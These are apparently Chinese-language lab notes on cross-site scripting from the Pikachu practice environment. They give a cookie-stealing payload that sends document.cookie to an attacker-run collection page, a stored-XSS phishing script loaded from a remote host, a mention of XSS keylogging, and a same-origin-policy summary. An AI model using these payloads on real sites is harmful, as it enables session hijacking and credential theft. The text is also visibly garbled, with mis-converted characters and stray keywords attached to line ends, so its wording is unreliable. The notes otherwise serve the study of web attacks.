漏洞.doc

cookie獲取xss後臺使用php

   引起用戶點擊特製url(好比告訴用戶這是優惠網),用戶點擊後進入攻擊者指定的本身的頁面,返回用戶的cookie到攻擊者的後臺css

<script>跨域

document .location='http://192.168.1.15/pkxss/xcookie/cookie.php?cookie='+ document.cookie;cookie

</script>xss

 構造的url指定連接是後臺存儲cookiede頁面,頁面能夠重定向到其餘頁面,不引發用戶的懷疑url

 

 

 

 

 

 

 

 

 

xss釣魚ip

代碼資源

 

在存在存儲型xss漏洞的留言板上輸入:<script src="http://10.67.1.251/pikachu/pkxss/xfish.php" ></script>iframe

xss獲取鍵盤記錄域名

 

同源策略:兩個不一樣域名之間(跨域)不能使用js進行相互操做。如需進行跨域操做,要進行特殊配置,好比經過:header(「Access-Control-Allow-Origin:x.com)  //容許被x.com跨域請求

下面這些標籤不受同源策略限制:

<script src=」..」>//js,加載到本地

<img src=」..」>

<link href=」..」>//css

<iframe src=」..」>//任意資源

相關文章
相關標籤/搜索